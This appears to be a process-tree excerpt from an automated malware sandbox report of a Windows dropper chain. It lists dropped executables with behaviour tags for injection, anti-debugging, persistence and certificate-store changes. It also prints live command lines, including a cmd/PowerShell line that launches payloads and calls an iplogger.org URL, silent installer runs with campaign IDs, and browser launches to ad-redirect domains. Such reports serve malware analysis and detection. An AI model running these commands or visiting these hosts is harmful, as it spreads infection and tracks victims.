C:\Users\Admin\Documents\JbYLmYkiL5oh_BFQXzN1N2aA.exe"C:\Users\Admin\Documents\JbYLmYkiL5oh_BFQXzN1N2aA.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\82ccQYnRwSkZfpeuxGHOYtVJ.exe"C:\Users\Admin\Documents\82ccQYnRwSkZfpeuxGHOYtVJ.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\9YsDhPL0CFb8u51TEbNMNQPm.exe"C:\Users\Admin\Documents\9YsDhPL0CFb8u51TEbNMNQPm.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\gRPQnJhorUeOOxV8vnDmDfPK.exe"C:\Users\Admin\Documents\gRPQnJhorUeOOxV8vnDmDfPK.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\qFlx4UH2YUQ4dqR4Wrkd4DnA.exe"C:\Users\Admin\Documents\qFlx4UH2YUQ4dqR4Wrkd4DnA.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\fOdOVTJ4cAdpEqSN_u_aeghQ.exe"C:\Users\Admin\Documents\fOdOVTJ4cAdpEqSN_u_aeghQ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\fOdOVTJ4cAdpEqSN_u_aeghQ.exe"C:\Users\Admin\Documents\fOdOVTJ4cAdpEqSN_u_aeghQ.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\x3NgCE44wh3S1__Hyb5PvqVl.exe"C:\Users\Admin\Documents\x3NgCE44wh3S1__Hyb5PvqVl.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\u7WmSWxlHGRHf4l8vPpMvpUY.exe"C:\Users\Admin\Documents\u7WmSWxlHGRHf4l8vPpMvpUY.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 2567⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\asCr7xkj3vPL813Pivuf3qJz.exe"C:\Users\Admin\Documents\asCr7xkj3vPL813Pivuf3qJz.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "f.exe" & start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"7⤵
-
C:\Users\Admin\AppData\Local\Temp\f.exe"f.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\wwi.exe"wwi.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\wwl.exe"wwl.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"8⤵
- Blocklisted process makes network request
-
C:\Users\Admin\Documents\_eFGDGYkyZFPd0GWkch8P7Fe.exe"C:\Users\Admin\Documents\_eFGDGYkyZFPd0GWkch8P7Fe.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\W7aNRfk1wBRZpenTZJTDXqd2.exe"C:\Users\Admin\Documents\W7aNRfk1wBRZpenTZJTDXqd2.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\cy3BD8IMClWAp4Sb5SGnjwsu.exe"C:\Users\Admin\Documents\cy3BD8IMClWAp4Sb5SGnjwsu.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\sE6oyYqka7gpVuUPduXmrRUI.exe"C:\Users\Admin\Documents\sE6oyYqka7gpVuUPduXmrRUI.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\3464864.scr"C:\Users\Admin\AppData\Roaming\3464864.scr" /S7⤵
-
C:\Users\Admin\AppData\Roaming\5847552.scr"C:\Users\Admin\AppData\Roaming\5847552.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\7470814.scr"C:\Users\Admin\AppData\Roaming\7470814.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat20578e6239.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20578e6239.exeSat20578e6239.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat2071d99516dc03841.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat2071d99516dc03841.exeSat2071d99516dc03841.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\tmpD12A_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpD12A_tmp.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmpD12A_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpD12A_tmp.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat20fbae42a4.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20fbae42a4.exeSat20fbae42a4.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-VQ9TR.tmp\Sat20fbae42a4.tmp"C:\Users\Admin\AppData\Local\Temp\is-VQ9TR.tmp\Sat20fbae42a4.tmp" /SL5="$3012E,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20fbae42a4.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-AHL8S.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-AHL8S.tmp\Ze2ro.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Defender Advanced Threat Protection\PXXLGNYZKI\ultramediaburner.exe"C:\Program Files\Windows Defender Advanced Threat Protection\PXXLGNYZKI\ultramediaburner.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FB65A.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-FB65A.tmp\ultramediaburner.tmp" /SL5="$4026E,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\PXXLGNYZKI\ultramediaburner.exe" /VERYSILENT9⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
-
C:\Users\Admin\AppData\Local\Temp\e4-cfcb5-f56-97e90-cbd743f01b99c\Qoteciqigae.exe"C:\Users\Admin\AppData\Local\Temp\e4-cfcb5-f56-97e90-cbd743f01b99c\Qoteciqigae.exe"8⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5056 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5056 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2820 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4728 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3612 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5368 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2896 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=3704 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5920 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4692 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5940 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3016 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,12348403721232609169,2395269645820871178,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515139⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x110,0x114,0x118,0xec,0x11c,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872159⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631199⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942319⤵
-
Depth 10: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de6e46f8,0x7ff8de6e4708,0x7ff8de6e4718
Depth 8: C:\Users\Admin\AppData\Local\Temp\4f-21c38-c9d-b148f-9a9f478d18995\Faqitapufi.exe
Command: "C:\Users\Admin\AppData\Local\Temp\4f-21c38-c9d-b148f-9a9f478d18995\Faqitapufi.exe"
Depth 9: C:\Windows\System32\cmd.exe
Command: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pj3e2znv.unq\GcleanerEU.exe /eufive & exit
Depth 10: C:\Users\Admin\AppData\Local\Temp\pj3e2znv.unq\GcleanerEU.exe
Command: C:\Users\Admin\AppData\Local\Temp\pj3e2znv.unq\GcleanerEU.exe /eufive
Depth 11: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -u -p 8588 -s 240
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
Depth 9: C:\Windows\System32\cmd.exe
Command: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gg35e2bq.zoa\installer.exe /qn CAMPAIGN="654" & exit
Depth 10: C:\Users\Admin\AppData\Local\Temp\gg35e2bq.zoa\installer.exe
Command: C:\Users\Admin\AppData\Local\Temp\gg35e2bq.zoa\installer.exe /qn CAMPAIGN="654"
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
